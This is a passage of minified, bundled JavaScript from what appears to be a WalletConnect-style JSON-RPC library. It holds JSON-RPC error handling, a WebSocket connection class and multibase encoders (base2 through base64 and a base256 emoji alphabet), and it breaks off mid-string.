    return (0, $fb0266a13f89cf1a$export$af84821b5448ca78).includes(code);
}
function $ab82c37acb5ed82a$export$7543109e66e1748d(code) {
    return typeof code === "number";
}
function $ab82c37acb5ed82a$export$e1599abf47b5b568(type) {
    if (!Object.keys((0, $fb0266a13f89cf1a$export$cca5387ab287e1ae)).includes(type)) return (0, $fb0266a13f89cf1a$export$cca5387ab287e1ae)[0, $fb0266a13f89cf1a$export$d166979eca925bce];
    return (0, $fb0266a13f89cf1a$export$cca5387ab287e1ae)[type];
}
function $ab82c37acb5ed82a$export$60a3bac005957e12(code) {
    const match = Object.values((0, $fb0266a13f89cf1a$export$cca5387ab287e1ae)).find((e)=>e.code === code);
    if (!match) return (0, $fb0266a13f89cf1a$export$cca5387ab287e1ae)[0, $fb0266a13f89cf1a$export$d166979eca925bce];
    return match;
}
function $ab82c37acb5ed82a$export$6be064b82176dd99(response) {
    if (typeof response.error.code === "undefined") return {
        valid: false,
        error: "Missing code for JSON-RPC error"
    };
    if (typeof response.error.message === "undefined") return {
        valid: false,
        error: "Missing message for JSON-RPC error"
    };
    if (!$ab82c37acb5ed82a$export$7543109e66e1748d(response.error.code)) return {
        valid: false,
        error: `Invalid error code type for JSON-RPC: ${response.error.code}`
    };
    if ($ab82c37acb5ed82a$export$2ae0ec6393ab16c3(response.error.code)) {
        const error = $ab82c37acb5ed82a$export$60a3bac005957e12(response.error.code);
        if (error.message !== (0, $fb0266a13f89cf1a$export$cca5387ab287e1ae)[0, $fb0266a13f89cf1a$export$d166979eca925bce].message && response.error.message === error.message) return {
            valid: false,
            error: `Invalid error code message for JSON-RPC: ${response.error.code}`
        };
    }
    return {
        valid: true
    };
}
function $ab82c37acb5ed82a$export$f555d7d8f922e407(e, url, type) {
    return e.message.includes("getaddrinfo ENOTFOUND") || e.message.includes("connect ECONNREFUSED") ? new Error(`Unavailable ${type} RPC url at ${url}`) : e;
}


var $21f900087ef2a598$exports = {};
"use strict";
Object.defineProperty($21f900087ef2a598$exports, "__esModule", {
    value: true
});

var $7WQrb = parcelRequire("7WQrb");

$7WQrb.__exportStar((parcelRequire("ljFVp")), $21f900087ef2a598$exports);

$7WQrb.__exportStar((parcelRequire("5vmD7")), $21f900087ef2a598$exports);


const $c1abc8a6542d5235$export$d1694901a048d7c8 = (0, $21f900087ef2a598$exports.isNode);




function $3bb3ddc7bbc938cc$export$2f5364a5d4b80251(entropy = 3) {
    const date = Date.now() * Math.pow(10, entropy);
    const extra = Math.floor(Math.random() * Math.pow(10, entropy));
    return date + extra;
}
function $3bb3ddc7bbc938cc$export$799a3db5df197877(entropy = 6) {
    return BigInt($3bb3ddc7bbc938cc$export$2f5364a5d4b80251(entropy));
}
function $3bb3ddc7bbc938cc$export$11d081ebb32d4398(method, params, id) {
    return {
        id: id || $3bb3ddc7bbc938cc$export$2f5364a5d4b80251(),
        jsonrpc: "2.0",
        method: method,
        params: params
    };
}
function $3bb3ddc7bbc938cc$export$478fdea01c2a3198(id, result) {
    return {
        id: id,
        jsonrpc: "2.0",
        result: result
    };
}
function $3bb3ddc7bbc938cc$export$9f7302ae26c3f77(id, error, data) {
    return {
        id: id,
        jsonrpc: "2.0",
        error: $3bb3ddc7bbc938cc$export$5201d50a34753d71(error, data)
    };
}
function $3bb3ddc7bbc938cc$export$5201d50a34753d71(error, data) {
    if (typeof error === "undefined") return (0, $ab82c37acb5ed82a$export$e1599abf47b5b568)((0, $fb0266a13f89cf1a$export$f6e3abf3038d348f));
    if (typeof error === "string") error = Object.assign(Object.assign({}, (0, $ab82c37acb5ed82a$export$e1599abf47b5b568)((0, $fb0266a13f89cf1a$export$125ebd30471ac25c))), {
        message: error
    });
    if (typeof data !== "undefined") error.data = data;
    if ((0, $ab82c37acb5ed82a$export$2ae0ec6393ab16c3)(error.code)) error = (0, $ab82c37acb5ed82a$export$60a3bac005957e12)(error.code);
    return error;
}


function $d805e0076f614f48$export$9f3e656a7f6a3adc(route) {
    if (route.includes("*")) return $d805e0076f614f48$export$8e8b9bea55b56df2(route);
    if (/\W/g.test(route)) return false;
    return true;
}
function $d805e0076f614f48$export$c7e2040809cad2c4(route) {
    return route === "*";
}
function $d805e0076f614f48$export$8e8b9bea55b56df2(route) {
    if ($d805e0076f614f48$export$c7e2040809cad2c4(route)) return true;
    if (!route.includes("*")) return false;
    if (route.split("*").length !== 2) return false;
    if (route.split("*").filter((x)=>x.trim() === "").length !== 1) return false;
    return true;
}
function $d805e0076f614f48$export$2d48faaafcc8fbdc(route) {
    return !$d805e0076f614f48$export$c7e2040809cad2c4(route) && $d805e0076f614f48$export$8e8b9bea55b56df2(route) && !route.split("*")[0].trim();
}
function $d805e0076f614f48$export$be298a4710fab756(route) {
    return !$d805e0076f614f48$export$c7e2040809cad2c4(route) && $d805e0076f614f48$export$8e8b9bea55b56df2(route) && !route.split("*")[1].trim();
}




class $223baefd0cc0a951$export$ab429ec7e240e546 {
}



class $4b3041b8db0f8b25$export$77d426dd89724fbe extends (0, $223baefd0cc0a951$export$ab429ec7e240e546) {
    constructor(opts){
        super();
    }
}
class $4b3041b8db0f8b25$export$cb916a2eed49af33 extends (0, $223baefd0cc0a951$export$ab429ec7e240e546) {
    constructor(){
        super();
    }
}
class $4b3041b8db0f8b25$export$46957420a688a16d extends $4b3041b8db0f8b25$export$cb916a2eed49af33 {
    constructor(connection){
        super();
    }
}








const $ceb127018999f416$var$HTTP_REGEX = "^https?:";
const $ceb127018999f416$var$WS_REGEX = "^wss?:";
function $ceb127018999f416$var$getUrlProtocol(url) {
    const matches = url.match(new RegExp(/^\w+:/, "gi"));
    if (!matches || !matches.length) return;
    return matches[0];
}
function $ceb127018999f416$var$matchRegexProtocol(url, regex) {
    const protocol = $ceb127018999f416$var$getUrlProtocol(url);
    if (typeof protocol === "undefined") return false;
    return new RegExp(regex).test(protocol);
}
function $ceb127018999f416$export$206c3129b8bb1b4f(url) {
    return $ceb127018999f416$var$matchRegexProtocol(url, $ceb127018999f416$var$HTTP_REGEX);
}
function $ceb127018999f416$export$4e4463e75eccf20c(url) {
    return $ceb127018999f416$var$matchRegexProtocol(url, $ceb127018999f416$var$WS_REGEX);
}
function $ceb127018999f416$export$8eb4a0a481601f29(url) {
    return new RegExp("wss?://localhost(:d{2,5})?").test(url);
}


function $2e45abd1d679ec32$export$bf3617e9fafa893f(payload) {
    return typeof payload === "object" && "id" in payload && "jsonrpc" in payload && payload.jsonrpc === "2.0";
}
function $2e45abd1d679ec32$export$f6e4034abe07d2a5(payload) {
    return $2e45abd1d679ec32$export$bf3617e9fafa893f(payload) && "method" in payload;
}
function $2e45abd1d679ec32$export$308ba927de2bcbe8(payload) {
    return $2e45abd1d679ec32$export$bf3617e9fafa893f(payload) && ($2e45abd1d679ec32$export$cb3d3b20e3223d77(payload) || $2e45abd1d679ec32$export$5662a1047b4d1d15(payload));
}
function $2e45abd1d679ec32$export$cb3d3b20e3223d77(payload) {
    return "result" in payload;
}
function $2e45abd1d679ec32$export$5662a1047b4d1d15(payload) {
    return "error" in payload;
}
function $2e45abd1d679ec32$export$ae97720cc2d120d4(validation) {
    return "error" in validation && validation.valid === false;
}




class $1582203255a670cd$export$da28308012bf6748 extends (0, $4b3041b8db0f8b25$export$46957420a688a16d) {
    constructor(connection){
        super(connection);
        this.events = new (0, $7etJZ.EventEmitter)();
        this.hasRegisteredEventListeners = false;
        this.connection = this.setConnection(connection);
        if (this.connection.connected) this.registerEventListeners();
    }
    async connect(connection = this.connection) {
        await this.open(connection);
    }
    async disconnect() {
        await this.close();
    }
    on(event, listener) {
        this.events.on(event, listener);
    }
    once(event, listener) {
        this.events.once(event, listener);
    }
    off(event, listener) {
        this.events.off(event, listener);
    }
    removeListener(event, listener) {
        this.events.removeListener(event, listener);
    }
    async request(request, context) {
        return this.requestStrict((0, $3bb3ddc7bbc938cc$export$11d081ebb32d4398)(request.method, request.params || [], request.id || (0, $3bb3ddc7bbc938cc$export$799a3db5df197877)().toString()), context);
    }
    async requestStrict(request, context) {
        return new Promise(async (resolve, reject)=>{
            if (!this.connection.connected) try {
                await this.open();
            } catch (e) {
                reject(e);
            }
            this.events.on(`${request.id}`, (response)=>{
                if ((0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(response)) reject(response.error);
                else resolve(response.result);
            });
            try {
                await this.connection.send(request, context);
            } catch (e) {
                reject(e);
            }
        });
    }
    setConnection(connection = this.connection) {
        return connection;
    }
    onPayload(payload) {
        this.events.emit("payload", payload);
        if ((0, $2e45abd1d679ec32$export$308ba927de2bcbe8)(payload)) this.events.emit(`${payload.id}`, payload);
        else this.events.emit("message", {
            type: payload.method,
            data: payload.params
        });
    }
    onClose(event) {
        if (event && event.code === 3000) this.events.emit("error", new Error(`WebSocket connection closed abnormally with code: ${event.code} ${event.reason ? `(${event.reason})` : ""}`));
        this.events.emit("disconnect");
    }
    async open(connection = this.connection) {
        if (this.connection === connection && this.connection.connected) return;
        if (this.connection.connected) this.close();
        if (typeof connection === "string") {
            await this.connection.open(connection);
            connection = this.connection;
        }
        this.connection = this.setConnection(connection);
        await this.connection.open();
        this.registerEventListeners();
        this.events.emit("connect");
    }
    async close() {
        await this.connection.close();
    }
    registerEventListeners() {
        if (this.hasRegisteredEventListeners) return;
        this.connection.on("payload", (payload)=>this.onPayload(payload));
        this.connection.on("close", (event)=>this.onClose(event));
        this.connection.on("error", (error)=>this.events.emit("error", error));
        this.connection.on("register_error", (error)=>this.onClose());
        this.hasRegisteredEventListeners = true;
    }
}
var $1582203255a670cd$export$2e2bcd8739ae039 = $1582203255a670cd$export$da28308012bf6748;


var $566b2fdf5e300ab1$export$2e2bcd8739ae039 = (0, $1582203255a670cd$export$2e2bcd8739ae039);




var $7etJZ = parcelRequire("7etJZ");



const $d4cf0068a97a66e2$export$a82e41cf513c80da = ()=>{
    if (typeof WebSocket !== "undefined") return WebSocket;
    else if (typeof $parcel$global !== "undefined" && typeof $parcel$global.WebSocket !== "undefined") return $parcel$global.WebSocket;
    else if (typeof window !== "undefined" && typeof window.WebSocket !== "undefined") return window.WebSocket;
    else if (typeof self !== "undefined" && typeof self.WebSocket !== "undefined") return self.WebSocket;
    return (parcelRequire("jlahN"));
};
const $d4cf0068a97a66e2$export$6497c65e1ab5df4b = ()=>typeof WebSocket !== "undefined" || typeof $parcel$global !== "undefined" && typeof $parcel$global.WebSocket !== "undefined" || typeof window !== "undefined" && typeof window.WebSocket !== "undefined" || typeof self !== "undefined" && typeof self.WebSocket !== "undefined";
const $d4cf0068a97a66e2$export$4e09c449d6c407f7 = ()=>typeof window !== "undefined";
const $d4cf0068a97a66e2$export$d45d5c4a5bda9dc2 = (wssUrl)=>wssUrl.split("?")[0];


const $b32c19adc47af628$var$EVENT_EMITTER_MAX_LISTENERS_DEFAULT = 10;
const $b32c19adc47af628$var$WS = (0, $d4cf0068a97a66e2$export$a82e41cf513c80da)();
class $b32c19adc47af628$export$ea0df116fa892998 {
    constructor(url){
        this.url = url;
        this.events = new (0, $7etJZ.EventEmitter)();
        this.registering = false;
        if (!(0, $ceb127018999f416$export$4e4463e75eccf20c)(url)) throw new Error(`Provided URL is not compatible with WebSocket connection: ${url}`);
        this.url = url;
    }
    get connected() {
        return typeof this.socket !== "undefined";
    }
    get connecting() {
        return this.registering;
    }
    on(event, listener) {
        this.events.on(event, listener);
    }
    once(event, listener) {
        this.events.once(event, listener);
    }
    off(event, listener) {
        this.events.off(event, listener);
    }
    removeListener(event, listener) {
        this.events.removeListener(event, listener);
    }
    async open(url = this.url) {
        await this.register(url);
    }
    async close() {
        return new Promise((resolve, reject)=>{
            if (typeof this.socket === "undefined") {
                reject(new Error("Connection already closed"));
                return;
            }
            this.socket.onclose = (event)=>{
                this.onClose(event);
                resolve();
            };
            this.socket.close();
        });
    }
    async send(payload, context) {
        if (typeof this.socket === "undefined") this.socket = await this.register();
        try {
            this.socket.send((0, $81c2e06d24b89184$export$abc3f407e87918a4)(payload));
        } catch (e) {
            this.onError(payload.id, e);
        }
    }
    register(url = this.url) {
        if (!(0, $ceb127018999f416$export$4e4463e75eccf20c)(url)) throw new Error(`Provided URL is not compatible with WebSocket connection: ${url}`);
        if (this.registering) {
            const currentMaxListeners = this.events.getMaxListeners();
            if (this.events.listenerCount("register_error") >= currentMaxListeners || this.events.listenerCount("open") >= currentMaxListeners) this.events.setMaxListeners(currentMaxListeners + 1);
            return new Promise((resolve, reject)=>{
                this.events.once("register_error", (error)=>{
                    this.resetMaxListeners();
                    reject(error);
                });
                this.events.once("open", ()=>{
                    this.resetMaxListeners();
                    if (typeof this.socket === "undefined") return reject(new Error("WebSocket connection is missing or invalid"));
                    resolve(this.socket);
                });
            });
        }
        this.url = url;
        this.registering = true;
        return new Promise((resolve, reject)=>{
            const opts = !(0, $21f900087ef2a598$exports.isReactNative)() ? {
                rejectUnauthorized: !(0, $ceb127018999f416$export$8eb4a0a481601f29)(url)
            } : undefined;
            const socket = new $b32c19adc47af628$var$WS(url, [], opts);
            if ((0, $d4cf0068a97a66e2$export$6497c65e1ab5df4b)()) socket.onerror = (event)=>{
                const errorEvent = event;
                reject(this.emitError(errorEvent.error));
            };
            else socket.on("error", (errorEvent)=>{
                reject(this.emitError(errorEvent));
            });
            socket.onopen = ()=>{
                this.onOpen(socket);
                resolve(socket);
            };
        });
    }
    onOpen(socket) {
        socket.onmessage = (event)=>this.onPayload(event);
        socket.onclose = (event)=>this.onClose(event);
        this.socket = socket;
        this.registering = false;
        this.events.emit("open");
    }
    onClose(event) {
        this.socket = undefined;
        this.registering = false;
        this.events.emit("close", event);
    }
    onPayload(e) {
        if (typeof e.data === "undefined") return;
        const payload = typeof e.data === "string" ? (0, $81c2e06d24b89184$export$84137bb44359aed5)(e.data) : e.data;
        this.events.emit("payload", payload);
    }
    onError(id, e) {
        const error = this.parseError(e);
        const message = error.message || error.toString();
        const payload = (0, $3bb3ddc7bbc938cc$export$9f7302ae26c3f77)(id, message);
        this.events.emit("payload", payload);
    }
    parseError(e, url = this.url) {
        return (0, $ab82c37acb5ed82a$export$f555d7d8f922e407)(e, (0, $d4cf0068a97a66e2$export$d45d5c4a5bda9dc2)(url), "WS");
    }
    resetMaxListeners() {
        if (this.events.getMaxListeners() > $b32c19adc47af628$var$EVENT_EMITTER_MAX_LISTENERS_DEFAULT) this.events.setMaxListeners($b32c19adc47af628$var$EVENT_EMITTER_MAX_LISTENERS_DEFAULT);
    }
    emitError(errorEvent) {
        const error = this.parseError(new Error((errorEvent === null || errorEvent === void 0 ? void 0 : errorEvent.message) || `WebSocket connection failed for host: ${(0, $d4cf0068a97a66e2$export$d45d5c4a5bda9dc2)(this.url)}`));
        this.events.emit("register_error", error);
        return error;
    }
}
var $b32c19adc47af628$export$2e2bcd8739ae039 = $b32c19adc47af628$export$ea0df116fa892998;


var $5d413cc341fdd8f8$export$2e2bcd8739ae039 = (0, $b32c19adc47af628$export$2e2bcd8739ae039);



var $6cqMT = parcelRequire("6cqMT");
function $e9e439c110f17033$var$$i(r, e) {
    if (r.length >= 255) throw new TypeError("Alphabet too long");
    for(var t = new Uint8Array(256), i = 0; i < t.length; i++)t[i] = 255;
    for(var s = 0; s < r.length; s++){
        var n = r.charAt(s), a = n.charCodeAt(0);
        if (t[a] !== 255) throw new TypeError(n + " is ambiguous");
        t[a] = s;
    }
    var o = r.length, h = r.charAt(0), l = Math.log(o) / Math.log(256), d = Math.log(256) / Math.log(o);
    function b(u) {
        if (u instanceof Uint8Array || (ArrayBuffer.isView(u) ? u = new Uint8Array(u.buffer, u.byteOffset, u.byteLength) : Array.isArray(u) && (u = Uint8Array.from(u))), !(u instanceof Uint8Array)) throw new TypeError("Expected Uint8Array");
        if (u.length === 0) return "";
        for(var D = 0, A = 0, v = 0, R = u.length; v !== R && u[v] === 0;)v++, D++;
        for(var T = (R - v) * d + 1 >>> 0, m = new Uint8Array(T); v !== R;){
            for(var S = u[v], x = 0, I = T - 1; (S !== 0 || x < A) && I !== -1; I--, x++)S += 256 * m[I] >>> 0, m[I] = S % o >>> 0, S = S / o >>> 0;
            if (S !== 0) throw new Error("Non-zero carry");
            A = x, v++;
        }
        for(var P = T - A; P !== T && m[P] === 0;)P++;
        for(var B = h.repeat(D); P < T; ++P)B += r.charAt(m[P]);
        return B;
    }
    function y(u) {
        if (typeof u != "string") throw new TypeError("Expected String");
        if (u.length === 0) return new Uint8Array;
        var D = 0;
        if (u[D] !== " ") {
            for(var A = 0, v = 0; u[D] === h;)A++, D++;
            for(var R = (u.length - D) * l + 1 >>> 0, T = new Uint8Array(R); u[D];){
                var m = t[u.charCodeAt(D)];
                if (m === 255) return;
                for(var S = 0, x = R - 1; (m !== 0 || S < v) && x !== -1; x--, S++)m += o * T[x] >>> 0, T[x] = m % 256 >>> 0, m = m / 256 >>> 0;
                if (m !== 0) throw new Error("Non-zero carry");
                v = S, D++;
            }
            if (u[D] !== " ") {
                for(var I = R - v; I !== R && T[I] === 0;)I++;
                for(var P = new Uint8Array(A + (R - I)), B = A; I !== R;)P[B++] = T[I++];
                return P;
            }
        }
    }
    function k(u) {
        var D = y(u);
        if (D) return D;
        throw new Error(`Non-${e} character`);
    }
    return {
        encode: b,
        decodeUnsafe: y,
        decode: k
    };
}
var $e9e439c110f17033$var$Fi = $e9e439c110f17033$var$$i, $e9e439c110f17033$var$Mi = $e9e439c110f17033$var$Fi;
const $e9e439c110f17033$var$Oe = (r)=>{
    if (r instanceof Uint8Array && r.constructor.name === "Uint8Array") return r;
    if (r instanceof ArrayBuffer) return new Uint8Array(r);
    if (ArrayBuffer.isView(r)) return new Uint8Array(r.buffer, r.byteOffset, r.byteLength);
    throw new Error("Unknown type, must be binary type");
}, $e9e439c110f17033$var$Ki = (r)=>new TextEncoder().encode(r), $e9e439c110f17033$var$ki = (r)=>new TextDecoder().decode(r);
class $e9e439c110f17033$var$Bi {
    constructor(e, t, i){
        this.name = e, this.prefix = t, this.baseEncode = i;
    }
    encode(e) {
        if (e instanceof Uint8Array) return `${this.prefix}${this.baseEncode(e)}`;
        throw Error("Unknown type, must be binary type");
    }
}
class $e9e439c110f17033$var$ji {
    constructor(e, t, i){
        if (this.name = e, this.prefix = t, t.codePointAt(0) === void 0) throw new Error("Invalid prefix character");
        this.prefixCodePoint = t.codePointAt(0), this.baseDecode = i;
    }
    decode(e) {
        if (typeof e == "string") {
            if (e.codePointAt(0) !== this.prefixCodePoint) throw Error(`Unable to decode multibase string ${JSON.stringify(e)}, ${this.name} decoder only supports inputs prefixed with ${this.prefix}`);
            return this.baseDecode(e.slice(this.prefix.length));
        } else throw Error("Can only multibase decode strings");
    }
    or(e) {
        return $e9e439c110f17033$var$xe(this, e);
    }
}
class $e9e439c110f17033$var$Vi {
    constructor(e){
        this.decoders = e;
    }
    or(e) {
        return $e9e439c110f17033$var$xe(this, e);
    }
    decode(e) {
        const t = e[0], i = this.decoders[t];
        if (i) return i.decode(e);
        throw RangeError(`Unable to decode multibase string ${JSON.stringify(e)}, only inputs prefixed with ${Object.keys(this.decoders)} are supported`);
    }
}
const $e9e439c110f17033$var$xe = (r, e)=>new $e9e439c110f17033$var$Vi({
        ...r.decoders || {
            [r.prefix]: r
        },
        ...e.decoders || {
            [e.prefix]: e
        }
    });
class $e9e439c110f17033$var$qi {
    constructor(e, t, i, s){
        this.name = e, this.prefix = t, this.baseEncode = i, this.baseDecode = s, this.encoder = new $e9e439c110f17033$var$Bi(e, t, i), this.decoder = new $e9e439c110f17033$var$ji(e, t, s);
    }
    encode(e) {
        return this.encoder.encode(e);
    }
    decode(e) {
        return this.decoder.decode(e);
    }
}
const $e9e439c110f17033$var$H = ({ name: r, prefix: e, encode: t, decode: i })=>new $e9e439c110f17033$var$qi(r, e, t, i), $e9e439c110f17033$var$M = ({ prefix: r, name: e, alphabet: t })=>{
    const { encode: i, decode: s } = $e9e439c110f17033$var$Mi(t, e);
    return $e9e439c110f17033$var$H({
        prefix: r,
        name: e,
        encode: i,
        decode: (n)=>$e9e439c110f17033$var$Oe(s(n))
    });
}, $e9e439c110f17033$var$Yi = (r, e, t, i)=>{
    const s = {};
    for(let d = 0; d < e.length; ++d)s[e[d]] = d;
    let n = r.length;
    for(; r[n - 1] === "=";)--n;
    const a = new Uint8Array(n * t / 8 | 0);
    let o = 0, h = 0, l = 0;
    for(let d = 0; d < n; ++d){
        const b = s[r[d]];
        if (b === void 0) throw new SyntaxError(`Non-${i} character`);
        h = h << t | b, o += t, o >= 8 && (o -= 8, a[l++] = 255 & h >> o);
    }
    if (o >= t || 255 & h << 8 - o) throw new SyntaxError("Unexpected end of data");
    return a;
}, $e9e439c110f17033$var$Gi = (r, e, t)=>{
    const i = e[e.length - 1] === "=", s = (1 << t) - 1;
    let n = "", a = 0, o = 0;
    for(let h = 0; h < r.length; ++h)for(o = o << 8 | r[h], a += 8; a > t;)a -= t, n += e[s & o >> a];
    if (a && (n += e[s & o << t - a]), i) for(; n.length * t & 7;)n += "=";
    return n;
}, $e9e439c110f17033$var$p = ({ name: r, prefix: e, bitsPerChar: t, alphabet: i })=>$e9e439c110f17033$var$H({
        prefix: e,
        name: r,
        encode (s) {
            return $e9e439c110f17033$var$Gi(s, i, t);
        },
        decode (s) {
            return $e9e439c110f17033$var$Yi(s, i, t, r);
        }
    }), $e9e439c110f17033$var$Ji = $e9e439c110f17033$var$H({
    prefix: "\x00",
    name: "identity",
    encode: (r)=>$e9e439c110f17033$var$ki(r),
    decode: (r)=>$e9e439c110f17033$var$Ki(r)
});
var $e9e439c110f17033$var$Hi = Object.freeze({
    __proto__: null,
    identity: $e9e439c110f17033$var$Ji
});
const $e9e439c110f17033$var$Wi = $e9e439c110f17033$var$p({
    prefix: "0",
    name: "base2",
    alphabet: "01",
    bitsPerChar: 1
});
var $e9e439c110f17033$var$Xi = Object.freeze({
    __proto__: null,
    base2: $e9e439c110f17033$var$Wi
});
const $e9e439c110f17033$var$Zi = $e9e439c110f17033$var$p({
    prefix: "7",
    name: "base8",
    alphabet: "01234567",
    bitsPerChar: 3
});
var $e9e439c110f17033$var$Qi = Object.freeze({
    __proto__: null,
    base8: $e9e439c110f17033$var$Zi
});
const $e9e439c110f17033$var$es = $e9e439c110f17033$var$M({
    prefix: "9",
    name: "base10",
    alphabet: "0123456789"
});
var $e9e439c110f17033$var$ts = Object.freeze({
    __proto__: null,
    base10: $e9e439c110f17033$var$es
});
const $e9e439c110f17033$var$is = $e9e439c110f17033$var$p({
    prefix: "f",
    name: "base16",
    alphabet: "0123456789abcdef",
    bitsPerChar: 4
}), $e9e439c110f17033$var$ss = $e9e439c110f17033$var$p({
    prefix: "F",
    name: "base16upper",
    alphabet: "0123456789ABCDEF",
    bitsPerChar: 4
});
var $e9e439c110f17033$var$rs = Object.freeze({
    __proto__: null,
    base16: $e9e439c110f17033$var$is,
    base16upper: $e9e439c110f17033$var$ss
});
const $e9e439c110f17033$var$ns = $e9e439c110f17033$var$p({
    prefix: "b",
    name: "base32",
    alphabet: "abcdefghijklmnopqrstuvwxyz234567",
    bitsPerChar: 5
}), $e9e439c110f17033$var$as = $e9e439c110f17033$var$p({
    prefix: "B",
    name: "base32upper",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567",
    bitsPerChar: 5
}), $e9e439c110f17033$var$os = $e9e439c110f17033$var$p({
    prefix: "c",
    name: "base32pad",
    alphabet: "abcdefghijklmnopqrstuvwxyz234567=",
    bitsPerChar: 5
}), $e9e439c110f17033$var$hs = $e9e439c110f17033$var$p({
    prefix: "C",
    name: "base32padupper",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567=",
    bitsPerChar: 5
}), $e9e439c110f17033$var$cs = $e9e439c110f17033$var$p({
    prefix: "v",
    name: "base32hex",
    alphabet: "0123456789abcdefghijklmnopqrstuv",
    bitsPerChar: 5
}), $e9e439c110f17033$var$us = $e9e439c110f17033$var$p({
    prefix: "V",
    name: "base32hexupper",
    alphabet: "0123456789ABCDEFGHIJKLMNOPQRSTUV",
    bitsPerChar: 5
}), $e9e439c110f17033$var$ls = $e9e439c110f17033$var$p({
    prefix: "t",
    name: "base32hexpad",
    alphabet: "0123456789abcdefghijklmnopqrstuv=",
    bitsPerChar: 5
}), $e9e439c110f17033$var$ds = $e9e439c110f17033$var$p({
    prefix: "T",
    name: "base32hexpadupper",
    alphabet: "0123456789ABCDEFGHIJKLMNOPQRSTUV=",
    bitsPerChar: 5
}), $e9e439c110f17033$var$gs = $e9e439c110f17033$var$p({
    prefix: "h",
    name: "base32z",
    alphabet: "ybndrfg8ejkmcpqxot1uwisza345h769",
    bitsPerChar: 5
});
var $e9e439c110f17033$var$ps = Object.freeze({
    __proto__: null,
    base32: $e9e439c110f17033$var$ns,
    base32upper: $e9e439c110f17033$var$as,
    base32pad: $e9e439c110f17033$var$os,
    base32padupper: $e9e439c110f17033$var$hs,
    base32hex: $e9e439c110f17033$var$cs,
    base32hexupper: $e9e439c110f17033$var$us,
    base32hexpad: $e9e439c110f17033$var$ls,
    base32hexpadupper: $e9e439c110f17033$var$ds,
    base32z: $e9e439c110f17033$var$gs
});
const $e9e439c110f17033$var$Ds = $e9e439c110f17033$var$M({
    prefix: "k",
    name: "base36",
    alphabet: "0123456789abcdefghijklmnopqrstuvwxyz"
}), $e9e439c110f17033$var$ys = $e9e439c110f17033$var$M({
    prefix: "K",
    name: "base36upper",
    alphabet: "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
});
var $e9e439c110f17033$var$bs = Object.freeze({
    __proto__: null,
    base36: $e9e439c110f17033$var$Ds,
    base36upper: $e9e439c110f17033$var$ys
});
const $e9e439c110f17033$var$ms = $e9e439c110f17033$var$M({
    name: "base58btc",
    prefix: "z",
    alphabet: "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
}), $e9e439c110f17033$var$Es = $e9e439c110f17033$var$M({
    name: "base58flickr",
    prefix: "Z",
    alphabet: "123456789abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ"
});
var $e9e439c110f17033$var$fs = Object.freeze({
    __proto__: null,
    base58btc: $e9e439c110f17033$var$ms,
    base58flickr: $e9e439c110f17033$var$Es
});
const $e9e439c110f17033$var$ws = $e9e439c110f17033$var$p({
    prefix: "m",
    name: "base64",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",
    bitsPerChar: 6
}), $e9e439c110f17033$var$vs = $e9e439c110f17033$var$p({
    prefix: "M",
    name: "base64pad",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
    bitsPerChar: 6
}), $e9e439c110f17033$var$Is = $e9e439c110f17033$var$p({
    prefix: "u",
    name: "base64url",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_",
    bitsPerChar: 6
}), $e9e439c110f17033$var$Cs = $e9e439c110f17033$var$p({
    prefix: "U",
    name: "base64urlpad",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_=",
    bitsPerChar: 6
});
var $e9e439c110f17033$var$_s = Object.freeze({
    __proto__: null,
    base64: $e9e439c110f17033$var$ws,
    base64pad: $e9e439c110f17033$var$vs,
    base64url: $e9e439c110f17033$var$Is,
    base64urlpad: $e9e439c110f17033$var$Cs
});
const $e9e439c110f17033$var$Ae = Array.from("\uD83D\uDE80\uD83E\uDE90☄\uD83D\uDEF0\uD83C\uDF0C\uD83C\uDF11\uD83C\uDF12\uD83C\uDF13\uD83C\uDF14\uD83C\uDF15\uD83C\uDF16\uD83C\uDF17\uD83C\uDF18\uD83C\uDF0D\uD83C\uDF0F\uD83C\uDF0E\uD83D\uDC09☀\uD83D\uDCBB\uD83D\uDDA5\uD83D\uDCBE\uD83D\uDCBF\uD83D\uDE02❤\uD83D\uDE0D\uD83E\uDD23\uD83D\uDE0A\uD83D\uDE4F\uD83D\uDC95\uD83D\uDE2D\uD83D\uDE18\uD83D\uDC4D\uD83D\uDE05\uD83D\uDC4F\uD83D\uDE01\uD83D\uDD25\uD83E\uDD70\uD83D\uDC94\uD83D\uDC96\uD83D\uDC99\uD83D\uDE22\uD83E\uDD14\uD83D\uDE06\uD83D\uDE44\uD83D\uDCAA\uD83D\uDE09☺\uD83D\uDC4C\uD83E\uDD17\uD83D\uDC9C\uD83D\uDE14\uD83D\uDE0E\uD83D\uDE07\uD83C\uDF39\uD83E\uDD26\uD83C\uDF89\uD83D\uDC9E✌✨\uD83E\uDD37\uD83D\uDE31\uD83D\uDE0C\uD83C\uDF38\uD83D\uDE4C\uD83D\uDE0B\uD83D\uDC97\uD83D\uDC9A\uD83D\uDE0F\uD83D\uDC9B\uD83D\uDE42\uD83D\uDC93\uD83E\uDD29\uD83D\uDE04\uD83D\uDE00\uD83D\uDDA4\uD83D\uDE03\uD83D\uDCAF\uD83D\uDE48\uD83D\uDC47\uD83C\uDFB6\uD83D\uDE12\uD83E\uDD2D❣\uD83D\uDE1C\uD83D\uDC8B\uD83D\uDC40\uD83D\uDE2A\uD83D\uDE11\uD83D\uDCA5\uD83D\uDE4B\uD83D\uDE1E\uD83D\uDE29\uD83D\uDE21\uD83E\uDD2A\uD83D\uDC4A\uD83E\uDD73\uD83D\uDE25\uD83E\uDD24\uD83D\uDC49\uD83D\uDC83\uD83D\uDE33✋\uD83D\uDE1A\uD83D\uDE1D\uD83D\uDE34\uD83C\uDF1F\uD83D\uDE2C\uD83D\uDE43\uD83C\uDF40\uD83C\uDF37\uD83D\uDE3B\uD83D\uDE13⭐✅\uD83E\uDD7A\uD83C\uDF08\uD83D\u